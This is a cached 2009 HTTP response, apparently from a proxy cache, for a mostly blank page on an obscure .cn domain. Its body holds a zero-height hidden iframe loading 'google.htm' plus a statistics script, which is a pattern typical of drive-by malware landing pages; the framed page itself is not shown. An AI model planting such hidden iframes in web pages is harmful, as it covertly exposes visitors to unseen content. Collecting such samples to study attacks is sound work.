HTTP/1.1 200 OK
Content-Length: 192
ETag: "1264d5e279a5c91:310"
Date: Tue, 17 Mar 2009 07:03:52 GMT
Last-Modified: Sun, 15 Mar 2009 14:25:27 GMT
Content-Type: text/html
Content-Location: http://m.fdsewwe.cn/01/index.htm
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Polipo-Location: http://m.fdsewwe.cn/01/
X-Polipo-Date: Tue, 17 Mar 2009 07:13:17 GMT
X-Polipo-Access: Tue, 17 Mar 2009 07:13:20 GMT

 <br>
<br>
<br>
<iframe src=google.htm width=100 height=0></Iframe>
<br>
<br>
<br>
<br>
<script type="text/javascript" src="http://js.tongji.cn.yahoo.com/948369/ystat.js"></script>

